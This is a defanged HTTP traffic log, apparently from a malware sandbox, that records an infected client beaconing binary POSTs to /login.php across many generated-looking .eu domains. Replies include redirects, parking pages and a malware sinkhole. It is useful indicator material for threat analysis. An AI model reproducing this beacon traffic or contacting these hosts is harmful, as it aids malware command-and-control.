Connection: close

Set-Cookie: anbtr=90623dde15463e9fb45001ad5063db65; domain=.nopegymozow.eu

19..Landed nopegymozow.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: digivehusyd.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 200 OK

Connection: close

Set-Cookie: jsessionid=e90c55b2c9a14c217bf26ca73db4527f; Expires=Fri, 18 Nov 2022 09:08:59 GMT

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Length: 0

Content-Type: text/plain; charset=utf-8

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qetuluvolos.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:39 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.qetuluvolos.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:39 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.qetuluvolos.eu..Vary: Accept-Encoding......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qetuluvolos.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:43 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.qetuluvolos.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:43 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.qetuluvolos.eu..Vary: Accept-Encoding..

GET /domain/rynazuqihoj.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu

Location: hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888

3e..Go hXXp://xsso.rynazuqihoj.eu/f2c2596452aa9379694886959d3b2888..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galokusemus.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:30 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.galokusemus.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.galokusemus.eu..Vary: Accept-Encoding..

GET /4abc123f5bc1fe014bbeb686d9306960 HTTP/1.1

Host: xsso.marytymenok.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=50f0100787987c2c428a9f0fa37a4606|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu

19..Landed marytymenok.eu<br>..0..

GET /domain/vofozymufok.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: sso.anbtr.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=519227042aaa4d45b3d8d04c6d6182c2; domain=.vofozymufok.eu

Location: hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2

3e..Go hXXp://xsso.vofozymufok.eu/519227042aaa4d45b3d8d04c6d6182c2..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: rynyhipexon.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:22:11 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.rynyhipexon.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:11 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.rynyhipexon.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: dimutobihom.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:30 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww92.dimutobihom.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:30 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.dimutobihom.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: norumikemem.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.norumikemem.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.norumikemem.eu..Vary: Accept-Encoding..

GET /f2c2596452aa9379694886959d3b2888 HTTP/1.1

Host: xsso.rynazuqihoj.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=db559cd2ebfad778907f69945582240c|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=f2c2596452aa9379694886959d3b2888; domain=.rynazuqihoj.eu

19..Landed rynazuqihoj.eu<br>..0..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qebahilojam.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.3.10-1ubuntu3.11

Location: hXXp://ww62.qebahilojam.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.qebahilojam.eu..Vary: Accept-Encoding..

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: jewuqyjywyv.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Fri, 20 Nov 2015 09:08:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://sso.anbtr.com/domain/jewuqyjywyv.eu

Set-Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0

Set-Cookie: snkz=194.242.96.218

0..

GET /71c55851e5901a95263b027885fa0411 HTTP/1.1

Host: xsso.jewuqyjywyv.eu

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Cookie: btst=2eb3e8e51e54041546311d246b6dd730|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:09:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu

19..Landed jewuqyjywyv.eu<br>..0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.qekikyvutic.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:19 GMT

Server: Apache

Set-Cookie: vsid=909vr1955561591417248; expires=Wed, 18-Nov-2020 09:09:19 GMT; path=/; domain=ww92.qekikyvutic.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4ZsQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=74

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ikED3u47J16sfIBRasIHmX4ZsQVGoKi HPfV1RPTbc I2lTVX nUNgDONyylJP dZ/iuNF1ubDmxIRIzn81MNA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.qekikyvutic.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qekikyvutic.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.qekikyvutic.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.qekikyvutic.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qexofyqihid.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:34 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww92.qexofyqihid.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww92.qexofyqihid.eu..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.puregivytoh.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:27 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>puregivytoh.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'puregivytoh.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0My40MTgxOjZlM2E5MWJiY2MzZjAxNTY1ZmNmM2ZjNGIyNGFjMmMyYjRlZTFhMTJlZDFlNTI4ZGUxODRhOWVlMTNiYTViYTE6NTY0ZWUzMmY2NjE2Mw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMyZjY1MGFmfHx8MTQ0ODAxMDU0My40MjJ8NWVhN2YzMjZmNjRmYWVhOTY0M2U3MGZkMzZlNzg5OTA3MmU4NTliN3x8fHx8MXx8fDB8NTY0ZWUzMmY4YWJmODJjZjM3OGI2MGFmfHx8MHx8fHx8fDB8fHx8fHx8fHw=';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: cihunemyror.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'

HTTP/1.1 200 OK

X-Sinkhole: Malware sinkhole

Content-Type: text/html

Server: nginx/0.7.65

Date: Fri, 20 Nov 2015 09:09:00 GMT

Content-Length: 0

HTTP/1.1 200 OK..X-Sinkhole: Malware sinkhole..Content-Type: text/html..Server: nginx/0.7.65..Date: Fri, 20 Nov 2015 09:09:00 GMT..Content-Length: 0..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.tufecagemyl.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:05 GMT

Server: Apache

Set-Cookie: vsid=910vr1955561452511509; expires=Wed, 18-Nov-2020 09:09:05 GMT; path=/; domain=ww92.tufecagemyl.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=106

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_OAueoF3VxCXminZtCrSbUeaf/HsDdgnWFFNicfj0QmcpipVXgcsNGkjQHOYkS1zFBlgqBQ6yeTW/FUkZ/HPU5g==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.tufecagemyl.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.tufecagemyl.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.tufecagemyl.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.tufecagemyl.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen

<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.lykemujebeq.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:28 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>lykemujebeq.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'lykemujebeq.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NC40MTkxOjE1YmU1MTI1NmIwMmNjOGVjOTIyNDFiNDdhNTAzYTczYjRjNzZkOWE1NDkxMWFlMGY3MGE3ODg3ZTM2YjEwOWU6NTY0ZWUzMzA2NjU3MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDYzM2QyfHx8MTQ0ODAxMDU0NC40MjM0fGQ5OWFlODRlM2MzYzY0MmVlY2M3YzlkNjhkMWQ1MDhlMDkwZWZiZGF8fHx8fDF8fHwwfDU2NGVlMzMwODhmYmNlMTBiMDhiNDliZnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.qebahilojam.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:28 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>qebahilojam.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'qebahilojam.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NC40ODQyOjI4NjJkMzUzYzZlNDExYzJkYTc3M2UyOTZiOTdlNzk0MzQ2N2EwNmU0NWMwOWVkNGNjYWVkNzBiODQzYzJhN2I6NTY0ZWUzMzA3NjNjMA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDc0ODhkfHx8MTQ0ODAxMDU0NC40OTA1fDQzZTM0ZWMyNzk5ZjhjZDM1YWIyYjU1ZTZhZDdmZjcxMjNkNmQ4ZGV8fHx8fDF8fHwwfDU2NGVlMzMwZjg1MjVmZjY0YzhiNmQ2M3x8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww62.galokusemus.eu

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Nov 2015 09:18:24 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444

X-Language: english

X-Template: tpl_CleanPeppermintBlack_twoclick

5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>galokusemus.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'galokusemus.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0MC4zNzQ1OmJjMjE0NzM1MTkzNDc2MWFkMWJiYWY2YzRhMWI3NjQwYTljNjRkMDFlYzU2NmM4NDRiYTIxMjgxNjA5Y2E1NmY6NTY0ZWUzMmM1YjZmMg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTMyYzVhNzFhfHx8MTQ0ODAxMDU0MC4zNzg3fDAxYmZkMzU0NTNjYTdmOGMzMzhiZmQyOTQzZmUzYmVjYmU5MWYwOTB8fHx8fDF8fHwwfDU2NGVlMzJjZmE1MjVmYjQ0MThiNDk1Ynx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/

<<< skipped >>>

GET /domain/kemocujufys.eu HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

